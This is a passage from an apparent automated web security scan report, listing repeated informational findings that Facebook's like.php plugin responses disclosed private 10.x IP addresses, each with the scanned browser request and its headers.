Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.746. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.145.130

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df46c927d4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3677b9138%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.747. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.145.118

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df365585b5%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff30c81b7ac%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.748. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.137.64

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1cb946ef8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffd7be705c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.749. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.69.57

Request

GET /plugins/like.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df335cc5f6c%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1317e5bb4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fonline.wsj.com%2Fvideo%2Fshiller-recession-risk-ubstantial%2FF79D1D1C-021B-4EC1-9E2E-A909D2160AFD.html&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.750. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.139.32

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfb70d824c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff367d4868%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.751. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.122.54

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1f1569878%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff27817871c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.752. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.49.37

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df12a6809bc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2824c430%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.753. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.198.40

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df18d5e5274%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1de4dacf4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.754. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.189.54

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df32d339e58%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffb16b3e24%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.755. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.138.34

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df87ebd7cc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3859f0824%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.756. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.203.50

Request

GET /plugins/like.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2174bba78%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff25ccc10d%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fonline.wsj.com%2Fvideo%2Fshiller-recession-risk-ubstantial%2FF79D1D1C-021B-4EC1-9E2E-A909D2160AFD.html&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.757. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.115.39

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FRadiumOne%2F113084648745200%3Fv%3Dpage_getting_started&layout=standard&show_faces=false&width=450&action=like&font=arial&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://radiumone.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.758. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.30.64

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df38523abd4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff326be5c14%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.759. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.125.59

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FRadiumOne%2F113084648745200%3Fv%3Dpage_getting_started&layout=standard&show_faces=false&width=450&action=like&font=arial&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://radiumone.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.760. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.252.48

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df343f587a8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff28a44e6b4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.761. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.19.52

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df13f69d6fc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff395dfe8a%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.762. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.170.48

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3791e1e24%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff32d786f84%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.763. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.126.81

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2cdefafbc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffdc432e5%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.764. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.237.64

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfdd5cdee%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3575fe8e%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.765. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.11.61

Request

